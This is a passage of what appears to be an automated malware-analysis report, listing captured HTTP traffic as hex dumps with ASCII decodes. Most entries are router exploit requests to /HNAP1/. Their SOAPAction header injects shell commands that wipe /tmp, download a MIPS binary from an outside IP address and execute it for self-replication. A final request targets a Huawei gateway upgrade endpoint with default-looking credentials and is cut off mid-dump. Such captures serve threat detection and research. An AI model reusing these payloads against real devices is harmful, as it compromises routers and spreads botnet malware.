32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 